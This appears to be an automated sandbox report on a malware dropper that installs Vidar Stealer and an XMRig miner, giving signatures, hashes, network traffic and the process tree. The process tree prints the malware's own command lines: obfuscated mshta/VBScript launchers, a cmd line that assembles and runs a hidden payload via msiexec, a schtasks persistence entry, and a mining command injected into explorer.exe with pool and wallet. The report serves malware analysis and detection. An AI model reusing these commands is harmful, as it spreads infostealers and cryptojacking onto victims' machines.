| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2652-169-0x0000000000340000-0x0000000000346000-memory.dmp
memory/648-184-0x0000000001E90000-0x0000000001FED000-memory.dmp
memory/2896-193-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-192-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/648-194-0x0000000002A80000-0x0000000002B26000-memory.dmp
memory/2896-191-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2896-189-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2896-186-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2896-185-0x0000000000400000-0x000000000051C000-memory.dmp
memory/648-196-0x0000000002B30000-0x0000000002BC3000-memory.dmp
memory/648-195-0x0000000002B30000-0x0000000002BC3000-memory.dmp
memory/648-198-0x0000000002B30000-0x0000000002BC3000-memory.dmp
memory/2540-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-209-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-235-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-234-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-233-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1828-231-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-229-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-227-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-237-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-224-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-222-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-221-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-220-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2696-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-216-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-214-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-208-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-207-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2540-205-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-203-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-201-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-199-0x0000000000400000-0x0000000000422000-memory.dmp
memory/900-238-0x0000000000400000-0x0000000002DAA000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240708-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1984 set thread context of 2656 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Jonba.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\f78be40.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cxl-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f78be40.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
C:\Users\Admin\AppData\Local\Temp\inst2.exe
"C:\Users\Admin\AppData\Local\Temp\inst2.exe"
C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp" /SL5="$7021A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Users\Admin\AppData\Local\Temp\8.exe
"C:\Users\Admin\AppData\Local\Temp\8.exe"
C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp" /SL5="$A0192,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 1464
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
C:\Users\Admin\AppData\Local\Temp\f78be40.exe
"C:\Users\Admin\AppData\Local\Temp\f78be40.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 536
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | www.independent.co.uk | udp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 8.8.8.8:53 | rss.nytimes.com | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 8.8.8.8:53 | mas.to | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 172.67.166.96:443 | mas.to | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 45.9.20.156:80 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| GB | 142.250.187.238:80 | www.google-analytics.com | tcp |
| US | 8.8.8.8:53 | s3.tebi.io | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| GB | 51.195.138.197:14433 | xmr-eu2.nanopool.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| NL | 51.15.58.224:14433 | xmr-eu1.nanopool.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
Files
memory/2740-0-0x0000000074A8E000-0x0000000074A8F000-memory.dmp
memory/2740-1-0x0000000000E70000-0x000000000157C000-memory.dmp
\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
| MD5 | a97c8c767343939c63ab2c3a7f9186fd |
| SHA1 | 5a8582d13af999922c1ad75db58950ad9523f8dc |
| SHA256 | c528db4c190ac29c57c7810b26e9bf5c6e78b2ebbdbe64d81cfe57289a537768 |
| SHA512 | 268bb93a76760e4f8a3d3229cdc5dec5930de46d1fdd85950015f68dab403f615d3e5854d04c72397c990cfd5525f233920c540adad50ef1e2696426ec37b599 |
\Users\Admin\AppData\Local\Temp\inst2.exe
| MD5 | d57afeb2944b37345cda2e47db2ca5e3 |
| SHA1 | d3c8c74ae71450a59f005501d537bdb2bdd456ee |
| SHA256 | 06fa55c63ca655c7d67ac59fc8276d086bc39dbe727ef7de80fc42dcd575711e |
| SHA512 | d9ece7d17c4e275f85a4bc58128ef67abc33b19cc77425e5fd2f896a03975469432fa9ec8f05eeefe3ac5062c1fb842702cc80a4eb97b1737597b6dc3dde94e8 |
C:\Users\Admin\AppData\Local\Temp\4.exe
| MD5 | 1581dee9ad745f69413381da2c06f68b |
| SHA1 | 79926e1bbcb97f41e63efcba2ab696259fdb98ce |
| SHA256 | f8cb7c4bf0b265fcbed502ab4abb3dfa6c0488c0d53c68742582df26bbd6bf0e |
| SHA512 | 9ea8f526304bf123e4f50cb94468d01287576edafcbc25046c9d5094d8990dee38a9309d00462239a8c73f6b3d288354dd6fcfab29ab4fe60db6acde500283ff |
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
| MD5 | 199ac38e98448f915974878daeac59d5 |
| SHA1 | ec36afe8b99d254b6983009930f70d51232be57e |
| SHA256 | b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf |
| SHA512 | 61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | a7703240793e447ec11f535e808d2096 |
| SHA1 | 913af985f540dab68be0cdf999f6d7cb52d5be96 |
| SHA256 | 6a17ebf5da6aa3a1f4813e5f46fdd5d19d026bcfac91f232359f98e43df3c38f |
| SHA512 | 57bdcdfcfa11f6b5bf4149be0fee0444fcf67ccececf1009b166b17b7dce30da1a472f1890736186f4ef76e02ed23cc0dd2a41dc9bff94218a059832d4b5c69e |
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
| MD5 | 7b1ff60b0ba26d132c74535a641a0e02 |
| SHA1 | 0180b514cb32ae43fcefda0863a96f1f79a51b33 |
| SHA256 | accb11ccb1692a5e771981a5659d68c8adc3e225f476ca3387b57d818381ed1b |
| SHA512 | 3dbe1669e6f0f2c498a4276ef4d31ccf872bc2fcd4f1a1c282e6caf48d6cbd12d8685a05a9f43e3eef9fff8ba143ad1b14227f6c1a4a4263e242b5f8716a1034 |
memory/2844-40-0x0000000000910000-0x0000000000918000-memory.dmp
memory/2704-39-0x0000000000930000-0x000000000094A000-memory.dmp
memory/2552-44-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2704-49-0x0000000000240000-0x0000000000246000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
| MD5 | dd3f5335f760b949760b02aac1187694 |
| SHA1 | f53535bb3093caef66890688e6c214bcb4c51ef9 |
| SHA256 | 90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26 |
| SHA512 | e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004 |
\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
